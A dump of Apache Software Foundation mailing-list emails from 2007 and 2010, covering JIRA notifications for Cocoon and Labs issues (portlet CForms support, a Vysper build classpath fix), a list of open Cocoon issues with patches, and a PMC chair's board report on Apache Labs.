Received: from brutus.apache.org (localhost [161.129.204.104]) by brutus.apache.org (Postfix) with ESMTP id EA02D29A002F for <[email protected]>; Sat, 20 Feb 2010 07:16:27 -0800 (PST) Message-ID: <[email protected]> Date: Sat, 20 Feb 2010 15:16:27 +0000 (UTC) From: =?utf-8?Q?Francesco_Chicchiricc=C3=B2_=28JIRA=29?= <[email protected]> To: [email protected] Subject: [jira] Updated: (COCOON-2284) Making CForms working in JSR-168 portlets In-Reply-To: <[email protected]> MIME-Version: 1.0 Content-Type: text/plain; charset=utf-8 Content-Transfer-Encoding: quoted-printable X-JIRA-FingerPrint: 30527f35849b9dde25b450d4833f0394 X-Virus-Checked: Checked by ClamAV on apache.org [ https://issues.apache.org/jira/browse/COCOON-2284?page=3Dcom.atlassi= an.jira.plugin.system.issuetabpanels:all-tabpanel ] Francesco Chicchiricc=C3=B2 updated COCOON-2284: ------------------------------------------- Attachment: cocoon-2.1.11-as-portlet.tar.gz Simple maven 1.0 project for a Cocoon 2.1.11 portlet with working CForm and= other portlet goodies. > Making CForms working in JSR-168 portlets > ----------------------------------------- > > Key: COCOON-2284 > URL: https://issues.apache.org/jira/browse/COCOON-2284 > Project: Cocoon > Issue Type: Improvement > Components: Blocks: Forms, Blocks: Portal > Affects Versions: 2.1.11 > Reporter: Francesco Chicchiricc=C3=B2 > Attachments: cocoon-2.1.11-as-portlet.tar.gz, Form.js > > > I started from the wiki page at [1]: rather good, even though quite bound= to pluto 1.0. I could easily adapt the procedure to Open Portlet Container= [2] and Sun Portal Server; unfortunately, when it comes to CForms, the onl= y pointer is [3], very out of date nowadays. > The main issue in CForms is related to the fact that also [2] points out:= Portlet's ActionRequest can not have any response body. After some struggl= ing, I found the solution by modifying Form.js' sendFormAndWait() to be abl= e to cope with the former issue. > Another smaller issue is related to resources URI (for CSS and JS) that m= ust be adapted and rewritten by the LinkRewriter in order to be effective. > [1] http://wiki.apache.org/cocoon/CocoonAppAsJSR168Portlet > [2] https://portlet-container.dev.java.net/ > [3] http://blog.reverycodes.com/archives/000018.html --=20 This message is automatically generated by JIRA. - You can reply to this email to add a comment to the issue online. From [email protected] Wed Feb 24 10:40:54 2010 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 19127 invoked from network); 24 Feb 2010 10:40:54 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur.apache.org with SMTP; 24 Feb 2010 10:40:54 -0000 Received: (qmail 58593 invoked by uid 500); 24 Feb 2010 10:40:54 -0000 Delivered-To: [email protected] Received: (qmail 58492 invoked by uid 500); 24 Feb 2010 10:40:52 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk list-help: <mailto:[email protected]> list-unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> Reply-To: [email protected] List-Id: <dev.cocoon.apache.org> Delivered-To: mailing list [email protected] Received: (qmail 58484 invoked by uid 99); 24 Feb 2010 10:40:52 -0000 Received: from nike.apache.org (HELO nike.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Wed, 24 Feb 2010 10:40:52 +0000 X-ASF-Spam-Status: No, hits=-2000.0 required=10.0 tests=ALL_TRUSTED X-Spam-Check-By: apache.org Received: from [161.129.204.104] (HELO brutus.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Wed, 24 Feb 2010 10:40:50 +0000 Received: from brutus.apache.org (localhost [161.129.204.104]) by brutus.apache.org (Postfix) with ESMTP id 6546529A0018 for <[email protected]>; Wed, 24 Feb 2010 02:40:28 -0800 (PST) Message-ID: <[email protected]> Date: Wed, 24 Feb 2010 10:40:28 +0000 (UTC) From: [email protected] To: [email protected] Subject: [jira] Subscription: COCOON-open-with-patch MIME-Version: 1.0 Content-Type: text/plain; charset=utf-8 Content-Transfer-Encoding: 7bit X-JIRA-FingerPrint: 30527f35849b9dde25b450d4833f0394 X-Virus-Checked: Checked by ClamAV on apache.org Issue Subscription Filter: COCOON-open-with-patch (112 issues) Subscriber: cocoon Key Summary COCOON-2281 "Communication tools that we use" link to dev mailing list archive comes out at user mailing list archive https://issues.apache.org/jira/browse/COCOON-2281 COCOON-2278 Make SOAPHelper use https, not just http https://issues.apache.org/jira/browse/COCOON-2278 COCOON-2268 To extend the image reader we need to change the visibility to the parameter of the ImageReader https://issues.apache.org/jira/browse/COCOON-2268 COCOON-2262 container.refresh() is called before embeddedServlet.init() https://issues.apache.org/jira/browse/COCOON-2262 COCOON-2260 wrong parent version in pom of cocoon-flowscript-impl https://issues.apache.org/jira/browse/COCOON-2260 COCOON-2259 Memory leak in PoolableProxyHandler https://issues.apache.org/jira/browse/COCOON-2259 COCOON-2250 Wrong error message in Element.java (jx:element) https://issues.apache.org/jira/browse/COCOON-2250 COCOON-2249 XHTMLSerializer uses entity references &quot; and &apos; which cause JavaScript parse errors https://issues.apache.org/jira/browse/COCOON-2249 COCOON-2246 HttpRequest should handle encoding in getParameter and getParameterValues in the same way https://issues.apache.org/jira/browse/COCOON-2246 COCOON-2233 Update archetypes to current trunk artifact versions https://issues.apache.org/jira/browse/COCOON-2233 COCOON-2222 Add SaxParser configuration properties https://issues.apache.org/jira/browse/COCOON-2222 COCOON-2216 IncludeCacheManager can not perfom parallel includes https://issues.apache.org/jira/browse/COCOON-2216 COCOON-2212 jx:attribute does not check name is correct before proceeding https://issues.apache.org/jira/browse/COCOON-2212 COCOON-2197 Making the cocoon-auth-block acegi-security-sample work https://issues.apache.org/jira/browse/COCOON-2197 COCOON-2173 AbstractCachingProcessingPipeline: Two requests can deadlock each other https://issues.apache.org/jira/browse/COCOON-2173 COCOON-2162 [PATCH] Fix for Paginator when accessing out of bounds Pagination page https://issues.apache.org/jira/browse/COCOON-2162 COCOON-2137 XSD Schemas for CForms Development https://issues.apache.org/jira/browse/COCOON-2137 COCOON-2114 fix sorting in TraversableGenerator https://issues.apache.org/jira/browse/COCOON-2114 COCOON-2108 xmodule:flow-attr Does not accept document objects https://issues.apache.org/jira/browse/COCOON-2108 COCOON-2104 [PATCH] Add base URI fixup support to XIncludeTransformer https://issues.apache.org/jira/browse/COCOON-2104 COCOON-2100 Retrieving mimeType returned by pipeline executed from Flow https://issues.apache.org/jira/browse/COCOON-2100 COCOON-2041 WebDAV Returns improper status on PUT https://issues.apache.org/jira/browse/COCOON-2041 COCOON-2040 Union widget does not work with booleanfield set as case widget https://issues.apache.org/jira/browse/COCOON-2040 COCOON-2037 New DynamicGroup widget https://issues.apache.org/jira/browse/COCOON-2037 COCOON-2035 NPE in the sorter of the EnhancedRepeater https://issues.apache.org/jira/browse/COCOON-2035 COCOON-2032 [PATCH] Sort order in paginated repeater https://issues.apache.org/jira/browse/COCOON-2032 COCOON-2030 submit-on-change doesn't work for a multivaluefield with list-type="checkbox" https://issues.apache.org/jira/browse/COCOON-2030 COCOON-2018 Use thread context class loader to load custom binding classes https://issues.apache.org/jira/browse/COCOON-2018 COCOON-2017 More output beautification options for serializers https://issues.apache.org/jira/browse/COCOON-2017 COCOON-2015 Doctype added twice because root element (html) is inlined https://issues.apache.org/jira/browse/COCOON-2015 COCOON-2002 HTML transformer only works with latin-1 characters https://issues.apache.org/jira/browse/COCOON-2002 COCOON-1974 Donating ContextAttributeInputModule https://issues.apache.org/jira/browse/COCOON-1974 COCOON-1973 CaptchaValidator: allow case-insensitive matching https://issues.apache.org/jira/browse/COCOON-1973 COCOON-1964 Redirects inside a block called via the servlet protocol fail https://issues.apache.org/jira/browse/COCOON-1964 COCOON-1963 Add a redirect action to the browser update handler https://issues.apache.org/jira/browse/COCOON-1963 COCOON-1960 Pipeline errors for "generator/reader already set" should provide more information https://issues.apache.org/jira/browse/COCOON-1960 COCOON-1949 [PATCH] load flowscript from file into specified Rhino context object https://issues.apache.org/jira/browse/COCOON-1949 COCOON-1946 [PATCH] - Javaflow Sample errors trying to enhance Javaflow classes and showing cform templates https://issues.apache.org/jira/browse/COCOON-1946 COCOON-1943 [Patch] Parameters in blocks-protocol URIs get decoded too early https://issues.apache.org/jira/browse/COCOON-1943 COCOON-1932 [PATCH] correct styling of disabled suggestion lists https://issues.apache.org/jira/browse/COCOON-1932 COCOON-1929 [PATCH] Reloading classloader in Cocoon 2.2 https://issues.apache.org/jira/browse/COCOON-1929 COCOON-1917 Request Encoding problem: multipart/form vs. url encoded https://issues.apache.org/jira/browse/COCOON-1917 COCOON-1915 Nullable value with additional String or XMLizable in JavaSelectionList https://issues.apache.org/jira/browse/COCOON-1915 COCOON-1914 Text as XMLizable in EmptySelectionList https://issues.apache.org/jira/browse/COCOON-1914 COCOON-1899 [PATCH] Cocoon XML:DB Implementation should not depend on Xindice https://issues.apache.org/jira/browse/COCOON-1899 COCOON-1898 [PATCH] XPatch support for maven-cocoon-deployer-plugin https://issues.apache.org/jira/browse/COCOON-1898 COCOON-1893 XML-Binding: Problem creating a new element https://issues.apache.org/jira/browse/COCOON-1893 COCOON-1877 [PATCH] Pageable Repeater https://issues.apache.org/jira/browse/COCOON-1877 COCOON-1870 Lucene block does not store attributes when instructed so https://issues.apache.org/jira/browse/COCOON-1870 COCOON-1846 [PATCH] BooleanField and radio do not send on-value-changed at the rigth time with IE https://issues.apache.org/jira/browse/COCOON-1846 COCOON-1843 LDAPTransformer: add-entry tag doesn't work https://issues.apache.org/jira/browse/COCOON-1843 COCOON-1842 LDAPTransformer: ClassCastException with Binary fields https://issues.apache.org/jira/browse/COCOON-1842 COCOON-1810 [PATCH] JMSEventMessageListener does not work https://issues.apache.org/jira/browse/COCOON-1810 COCOON-1807 Workaround for IE Bug in <button> https://issues.apache.org/jira/browse/COCOON-1807 COCOON-1794 [PATCH] Propagation of namespaces to a repeaters child bindings and implementation of a move-node binding https://issues.apache.org/jira/browse/COCOON-1794 COCOON-1738 double-listbox problem in repeaters https://issues.apache.org/jira/browse/COCOON-1738 COCOON-1726 Implementation of Source that supports conditional GETs https://issues.apache.org/jira/browse/COCOON-1726 COCOON-1717 Use custom cache keys for caching uri coplets using input modules. https://issues.apache.org/jira/browse/COCOON-1717 COCOON-1697 Allow request parameters to be used in "for (var k in h)" kind of Javascript Loops https://issues.apache.org/jira/browse/COCOON-1697 COCOON-1648 Add support for ISO8601 in I18nTransformer and Forms https://issues.apache.org/jira/browse/COCOON-1648 COCOON-1618 [PATCH] SoapGenerator/Serializer for Axis Block https://issues.apache.org/jira/browse/COCOON-1618 COCOON-1611 [PATCH] Add additonal constructor to FormInstance.java to be able to pass a locale https://issues.apache.org/jira/browse/COCOON-1611 COCOON-1603 [PATCH] handling of alternatives in MailTransformer https://issues.apache.org/jira/browse/COCOON-1603 COCOON-1573 Improvement SetAttributeJXPathBinding and Contribution SetNodeValueJXPathBinding https://issues.apache.org/jira/browse/COCOON-1573 COCOON-1556 [PATCH] Add a JXPathConvertor for conversion betwean beans and Strings https://issues.apache.org/jira/browse/COCOON-1556 COCOON-1535 [PATCH] enhancement to {global:} input module: return all sitemap globals https://issues.apache.org/jira/browse/COCOON-1535 COCOON-1527 [PATCH] Cache control logic sheets for XSP to override getKey and getValidity https://issues.apache.org/jira/browse/COCOON-1527 COCOON-1526 [PATCH] processToDOM returns a read-only DOM https://issues.apache.org/jira/browse/COCOON-1526 COCOON-1519 [PATCH] TeeTransformer refactoring https://issues.apache.org/jira/browse/COCOON-1519 COCOON-1508 [PATCH] Avalonize TranscoderFactory https://issues.apache.org/jira/browse/COCOON-1508 COCOON-1506 [PATCH] Manually specifying a mounted sitemap's context https://issues.apache.org/jira/browse/COCOON-1506 COCOON-1488 [PATCH] htmlunit-based testing, needs to be ported to 2.2 https://issues.apache.org/jira/browse/COCOON-1488 COCOON-1467 ESQL exception handling problem https://issues.apache.org/jira/browse/COCOON-1467 COCOON-1439 [poi] vertical text orientation and font cache https://issues.apache.org/jira/browse/COCOON-1439 COCOON-1398 New CachingPortletAdapter https://issues.apache.org/jira/browse/COCOON-1398 COCOON-1395 [PATCH] Missing ContextAttributeInputModule https://issues.apache.org/jira/browse/COCOON-1395 COCOON-1394 [PATCH] Implementation of PortletRequest#getQueryString() https://issues.apache.org/jira/browse/COCOON-1394 COCOON-1384 [PATCH] flow redirector should allow explicit 'cocoon:' scheme https://issues.apache.org/jira/browse/COCOON-1384 COCOON-1370 [PATCH] proxy block can now use JTidy and handle multipart POST https://issues.apache.org/jira/browse/COCOON-1370 COCOON-1368 [PATCH] HTTPRequestTransformer https://issues.apache.org/jira/browse/COCOON-1368 COCOON-1362 [PATCH] log4j.xconf should have the same default config as logkit.xconf https://issues.apache.org/jira/browse/COCOON-1362 COCOON-1360 [patch] client side validation for CForms https://issues.apache.org/jira/browse/COCOON-1360 COCOON-1345 [PATCH] Extract convertors into their own block https://issues.apache.org/jira/browse/COCOON-1345 COCOON-1340 [PATCH] lucene block contribution : a AnalyzerManager component https://issues.apache.org/jira/browse/COCOON-1340 COCOON-1337 [PATCH] Suggestion for widget population https://issues.apache.org/jira/browse/COCOON-1337 COCOON-1336 [PATCH] PortletWindowAspect: hiding portlet mode icons and new feature "force-sizable" https://issues.apache.org/jira/browse/COCOON-1336 COCOON-1332 [PATCH] content-length and content-type for portlet ActionRequest https://issues.apache.org/jira/browse/COCOON-1332 COCOON-1329 [PATCH] Fix for cocoon.jar bundled in ear common for portal.war and portlet.war https://issues.apache.org/jira/browse/COCOON-1329 COCOON-1325 [PATCH] commons-fileupload based multipart parser https://issues.apache.org/jira/browse/COCOON-1325 COCOON-1302 [Patch] Word Document Generator https://issues.apache.org/jira/browse/COCOON-1302 COCOON-1295 ParallelContentAggregator, multithreaded aggregating https://issues.apache.org/jira/browse/COCOON-1295 COCOON-1260 [PATCH] MultipartParser can now handle multipart/mixed https://issues.apache.org/jira/browse/COCOON-1260 COCOON-1254 [Patch] OWQLTransformer + RDQLTransformer https://issues.apache.org/jira/browse/COCOON-1254 COCOON-1249 [Patch] XMLDBSource should accept scheme://user:pass@host:port/path URIs https://issues.apache.org/jira/browse/COCOON-1249 COCOON-1232 [PATCH] NEW--ModuleDB Action for ORACLE( auto. increment ) https://issues.apache.org/jira/browse/COCOON-1232 COCOON-1203 [PATCH] inserver junit testing https://issues.apache.org/jira/browse/COCOON-1203 COCOON-1200 [PATCH] XML CSS engine https://issues.apache.org/jira/browse/COCOON-1200 COCOON-1185 [PATCH] BerkeleyDBStore https://issues.apache.org/jira/browse/COCOON-1185 COCOON-1147 [PATCH] namespace issues with XMLDBTransformer https://issues.apache.org/jira/browse/COCOON-1147 COCOON-1125 [PATCH] Updated CastorTransformer + samples https://issues.apache.org/jira/browse/COCOON-1125 COCOON-1027 [PATCH] CocoonBean add additional features for reprocessing pipelines and interrupt processing https://issues.apache.org/jira/browse/COCOON-1027 COCOON-996 [PATCH] LuceneIndexContentHandler.java produces CLOBs https://issues.apache.org/jira/browse/COCOON-996 COCOON-988 [PATCH] StreamGenerator can't handle multipart request parameters correctly https://issues.apache.org/jira/browse/COCOON-988 COCOON-881 [PATCH] file upload component for usage with flowscript https://issues.apache.org/jira/browse/COCOON-881 COCOON-871 [PATCH] XML posting from SourceWritingTransformer by using an enhanced HTTPClientSource https://issues.apache.org/jira/browse/COCOON-871 COCOON-867 [PATCH] wsinclude and htmlinclude transformers https://issues.apache.org/jira/browse/COCOON-867 COCOON-865 [PATCH] New ResourceLoadAction https://issues.apache.org/jira/browse/COCOON-865 COCOON-844 [PATCH] adding <wd:on-phase> and moving load() and save() to Form. https://issues.apache.org/jira/browse/COCOON-844 COCOON-825 [PATCH] Fix Bug: Better handling of CLOB in esql (get-xml) and handling of Oracle 'temporary lobs' https://issues.apache.org/jira/browse/COCOON-825 COCOON-719 [PATCH] Support for transactions in SQLTransformer https://issues.apache.org/jira/browse/COCOON-719 COCOON-717 [PATCH] Namespace cleanup in HTMLSerializer https://issues.apache.org/jira/browse/COCOON-717 COCOON-665 [PATCH] HSSFSerializer Support for FreezePane https://issues.apache.org/jira/browse/COCOON-665 You may edit this subscription at: https://issues.apache.org/jira/secure/FilterSubscription!default.jspa?subId=10311&filterId=12310771
From [email protected] Wed Dec 12 19:03:06 2007 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 85701 invoked from network); 12 Dec 2007 19:03:05 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur.apache.org with SMTP; 12 Dec 2007 19:03:05 -0000 Received: (qmail 3902 invoked by uid 500); 12 Dec 2007 19:02:53 -0000 Delivered-To: [email protected] Received: (qmail 3794 invoked by uid 500); 12 Dec 2007 19:02:53 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <labs.labs.apache.org> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 3784 invoked by uid 99); 12 Dec 2007 19:02:52 -0000 Received: from athena.apache.org (HELO athena.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Wed, 12 Dec 2007 11:02:52 -0800 X-ASF-Spam-Status: No, hits=-100.0 required=10.0 tests=ALL_TRUSTED X-Spam-Check-By: apache.org Received: from [161.129.204.104] (HELO brutus.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Wed, 12 Dec 2007 19:02:40 +0000 Received: from brutus (localhost [161.129.204.104]) by brutus.apache.org (Postfix) with ESMTP id 3FC8871422B for <[email protected]>; Wed, 12 Dec 2007 11:02:43 -0800 (PST) Message-ID: <30240946.1197486163258.JavaMail.jira@brutus> Date: Wed, 12 Dec 2007 11:02:43 -0800 (PST) From: "Amos King (JIRA)" <[email protected]> To: [email protected] Subject: [jira] Created: (LABS-106) mina not added to the class paths of the build file MIME-Version: 1.0 Content-Type: text/plain; charset=utf-8 Content-Transfer-Encoding: 7bit X-Virus-Checked: Checked by ClamAV on apache.org mina not added to the class paths of the build file --------------------------------------------------- Key: LABS-106 URL: https://issues.apache.org/jira/browse/LABS-106 Project: Labs Issue Type: Improvement Components: Vysper Environment: OSX, PPC, JAVA 5 Reporter: Amos King Priority: Trivial The mina jars are not added to the classpath in the build file so if mina is not in the systems classpath the build fails. It would be really nice if the build just worked. -- This message is automatically generated by JIRA. - You can reply to this email to add a comment to the issue online. --------------------------------------------------------------------- To unsubscribe, e-mail: [email protected] For additional commands, e-mail: [email protected] From [email protected] Wed Dec 12 19:24:07 2007 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 30062 invoked from network); 12 Dec 2007 19:24:06 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur.apache.org with SMTP; 12 Dec 2007 19:24:06 -0000 Received: (qmail 34115 invoked by uid 500); 12 Dec 2007 19:23:54 -0000 Delivered-To: [email protected] Received: (qmail 34007 invoked by uid 500); 12 Dec 2007 19:23:54 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <labs.labs.apache.org> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 33998 invoked by uid 99); 12 Dec 2007 19:23:54 -0000 Received: from nike.apache.org (HELO nike.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Wed, 12 Dec 2007 11:23:54 -0800 X-ASF-Spam-Status: No, hits=-100.0 required=10.0 tests=ALL_TRUSTED X-Spam-Check-By: apache.org Received: from [161.129.204.104] (HELO brutus.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Wed, 12 Dec 2007 19:24:04 +0000 Received: from brutus (localhost [161.129.204.104]) by brutus.apache.org (Postfix) with ESMTP id 006A071422B for <[email protected]>; Wed, 12 Dec 2007 11:23:43 -0800 (PST) Message-ID: <27489605.1197487422998.JavaMail.jira@brutus> Date: Wed, 12 Dec 2007 11:23:42 -0800 (PST) From: "Amos King (JIRA)" <[email protected]> To: [email protected] Subject: [jira] Updated: (LABS-106) mina not added to the class paths of the build file In-Reply-To: <30240946.1197486163258.JavaMail.jira@brutus> MIME-Version: 1.0 Content-Type: text/plain; charset=utf-8 Content-Transfer-Encoding: 7bit X-Virus-Checked: Checked by ClamAV on apache.org [ https://issues.apache.org/jira/browse/LABS-106?page=com.atlassian.jira.plugin.system.issuetabpanels:all-tabpanel ] Amos King updated LABS-106: --------------------------- Attachment: labs_106.diff Here's the patch > mina not added to the class paths of the build file > --------------------------------------------------- > > Key: LABS-106 > URL: https://issues.apache.org/jira/browse/LABS-106 > Project: Labs > Issue Type: Improvement > Components: Vysper > Environment: OSX, PPC, JAVA 5 > Reporter: Amos King > Priority: Trivial > Attachments: labs_106.diff > > > The mina jars are not added to the classpath in the build file so if mina is not in the systems classpath the build fails. It would be really nice if the build just worked. -- This message is automatically generated by JIRA. - You can reply to this email to add a comment to the issue online. --------------------------------------------------------------------- To unsubscribe, e-mail: [email protected] For additional commands, e-mail: [email protected] From [email protected] Wed Dec 12 21:21:50 2007 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 88587 invoked from network); 12 Dec 2007 21:21:49 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur.apache.org with SMTP; 12 Dec 2007 21:21:49 -0000 Received: (qmail 28572 invoked by uid 500); 12 Dec 2007 21:21:37 -0000 Delivered-To: [email protected] Received: (qmail 28437 invoked by uid 500); 12 Dec 2007 21:21:37 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <labs.labs.apache.org> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 28428 invoked by uid 99); 12 Dec 2007 21:21:37 -0000 Received: from athena.apache.org (HELO athena.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Wed, 12 Dec 2007 13:21:37 -0800 X-ASF-Spam-Status: No, hits=3.8 required=10.0 tests=RCVD_NUMERIC_HELO,SPF_NEUTRAL X-Spam-Check-By: apache.org Received-SPF: neutral (athena.apache.org: local policy) Received: from [161.129.204.104] (HELO expo.whirlycott.com) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Wed, 12 Dec 2007 21:21:15 +0000 Received: (qmail 31410 invoked by uid 1016); 12 Dec 2007 19:34:36 -0000 Received: from 161.129.204.104 ([email protected]@161.129.204.104) by expo (envelope-from <[email protected]>, uid 0) with qmail-scanner-2.01 ( Clear:RC:1(161.129.204.104):. Processed in 0.01778 secs); 12 Dec 2007 19:34:36 -0000 Received: from cpe-76-173-19-129.socal.res.rr.com (HELO ?161.129.204.104?) ([email protected]@161.129.204.104) by expo.whirlycott.com with ESMTPA; 12 Dec 2007 19:34:36 -0000 Message-ID: <[email protected]> Date: Wed, 12 Dec 2007 11:34:37 -0800 From: Stefano Mazzocchi <[email protected]> User-Agent: Thunderbird 161.129.204.104 (Macintosh/20071031) MIME-Version: 1.0 To: Apache Board <[email protected]>, [email protected] Subject: [report] Apache Labs X-Enigmail-Version: 0.95.5 Content-Type: text/plain; charset=ISO-8859-1 Content-Transfer-Encoding: 7bit X-Virus-Checked: Checked by ClamAV on apache.org All it's quiet in Apache Labs. Some of the labs have some more or less steady activity and a few have more than one people working on it, but nothing that has yet reached the point of requiring action on the evolution of the lab. - o - One interesting lab that somewhat differs from all the others is Roy's Webarch (http://labs.apache.org/webarch/) which is now being used as input for the work of the HTTP next-gen IETF working group. I was, in fact, very positively surprised to see a reference to labs.apache.org from various blog posts on the future of HTTP and I like the fact that such links give credibility to labs. I feel the need to outline, though, that the "no release" rule for labs was created to avoid people from using labs as a way to route around the incubator, yet 'code-less' labs are able, in fact, to 'release' their own documentation artifacts, without oversight or the need for a community around the effort. That said, I'm only outlining the existence of such issue but I do not think this is currently creating a problem: the Webarch pages reflect the labs.apache.org style and in doing so clearly mark the work as 'experimental' or 'researchy', which is very similar than people publishing stuff on their people.apache.org/~user/ pages and creates a level of distance between any official apache position and the pages, even if they are served off of *.apache.org domains. Let me repeat: I think that Webarch and code-less labs are a *good thing* and should be encouraged in any way possible, as long as the product of their effort is clearly marked as coming from a lab (which is the case for Webarch) and not used as a way to abuse the apache branding to give resonance to an individual committer's effort. I'm just mentioning this so that both labs@ and board@ consider this food for thought and in no way I want such food for thought endanger the ability to use labs in the way Roy has done... but it's my duty, as PMC chair, to report changes in the project evolution that might require, in the future, board attention that this is the closest thing to that (even if, right now, does not require any action from any part and it's unlikely that it will require any in the future either). -- Stefano. --------------------------------------------------------------------- To unsubscribe, e-mail: [email protected] For additional commands, e-mail: [email protected] From [email protected] Wed Dec 12 21:59:06 2007 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 36873 invoked from network); 12 Dec 2007 21:59:05 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur.apache.org with SMTP; 12 Dec 2007 21:59:04 -0000 Received: (qmail 84781 invoked by uid 500); 12 Dec 2007 21:58:53 -0000 Delivered-To: [email protected] Received: (qmail 84670 invoked by uid 500); 12 Dec 2007 21:58:53 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <labs.labs.apache.org> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 84661 invoked by uid 99); 12 Dec 2007 21:58:53 -0000 Received: from athena.apache.org (HELO athena.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Wed, 12 Dec 2007 13:58:52 -0800 X-ASF-Spam-Status: No, hits=-100.0 required=10.0 tests=ALL_TRUSTED X-Spam-Check-By: apache.org Received: from [161.129.204.104] (HELO brutus.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Wed, 12 Dec 2007 21:58:40 +0000 Received: from brutus (localhost [161.129.204.104]) by brutus.apache.org (Postfix) with ESMTP id 6AD73714236 for <[email protected]>; Wed, 12 Dec 2007 13:58:43 -0800 (PST) Message-ID: <5497355.1197496723435.JavaMail.jira@brutus> Date: Wed, 12 Dec 2007 13:58:43 -0800 (PST) From: "Bernd Fondermann (JIRA)" <[email protected]> To: [email protected] Subject: [jira] Assigned: (LABS-106) mina not added to the class paths of the build file In-Reply-To: <30240946.1197486163258.JavaMail.jira@brutus> MIME-Version: 1.0 Content-Type: text/plain; charset=utf-8 Content-Transfer-Encoding: 7bit X-Virus-Checked: Checked by ClamAV on apache.org [ https://issues.apache.org/jira/browse/LABS-106?page=com.atlassian.jira.plugin.system.issuetabpanels:all-tabpanel ] Bernd Fondermann reassigned LABS-106: ------------------------------------- Assignee: Bernd Fondermann > mina not added to the class paths of the build file > --------------------------------------------------- > > Key: LABS-106 > URL: https://issues.apache.org/jira/browse/LABS-106 > Project: Labs > Issue Type: Improvement > Components: Vysper > Environment: OSX, PPC, JAVA 5 > Reporter: Amos King > Assignee: Bernd Fondermann > Priority: Trivial > Attachments: labs_106.diff > > > The mina jars are not added to the classpath in the build file so if mina is not in the systems classpath the build fails. It would be really nice if the build just worked. -- This message is automatically generated by JIRA. - You can reply to this email to add a comment to the issue online. --------------------------------------------------------------------- To unsubscribe, e-mail: [email protected] For additional commands, e-mail: [email protected] From [email protected] Wed Dec 12 22:01:36 2007 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 38892 invoked from network); 12 Dec 2007 22:01:35 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur.apache.org with SMTP; 12 Dec 2007 22:01:35 -0000 Received: (qmail 90956 invoked by uid 500); 12 Dec 2007 22:01:24 -0000 Delivered-To: [email protected] Received: (qmail 90733 invoked by uid 500); 12 Dec 2007 22:01:23 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <labs.labs.apache.org> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 90724 invoked by uid 99); 12 Dec 2007 22:01:23 -0000 Received: from nike.apache.org (HELO nike.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Wed, 12 Dec 2007 14:01:23 -0800 X-ASF-Spam-Status: No, hits=-100.0 required=10.0 tests=ALL_TRUSTED X-Spam-Check-By: apache.org Received: from [161.129.204.104] (HELO brutus.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Wed, 12 Dec 2007 22:01:32 +0000 Received: from brutus (localhost [161.129.204.104]) by brutus.apache.org (Postfix) with ESMTP id 3F5EE71420E for <[email protected]>; Wed, 12 Dec 2007 14:01:08 -0800 (PST) Message-ID: <9171703.1197496868254.JavaMail.jira@brutus> Date: Wed, 12 Dec 2007 14:01:08 -0800 (PST) From: "Bernd Fondermann (JIRA)" <[email protected]> To: [email protected] Subject: [jira] Closed: (LABS-106) mina not added to the class paths of the build file In-Reply-To: <30240946.1197486163258.JavaMail.jira@brutus> MIME-Version: 1.0 Content-Type: text/plain; charset=utf-8 Content-Transfer-Encoding: 7bit X-Virus-Checked: Checked by ClamAV on apache.org [ https://issues.apache.org/jira/browse/LABS-106?page=com.atlassian.jira.plugin.system.issuetabpanels:all-tabpanel ] Bernd Fondermann closed LABS-106. --------------------------------- Resolution: Fixed patch applied in r603751. many thanks! > mina not added to the class paths of the build file > --------------------------------------------------- > > Key: LABS-106 > URL: https://issues.apache.org/jira/browse/LABS-106 > Project: Labs > Issue Type: Improvement > Components: Vysper > Environment: OSX, PPC, JAVA 5 > Reporter: Amos King > Assignee: Bernd Fondermann > Priority: Trivial > Attachments: labs_106.diff > > > The mina jars are not 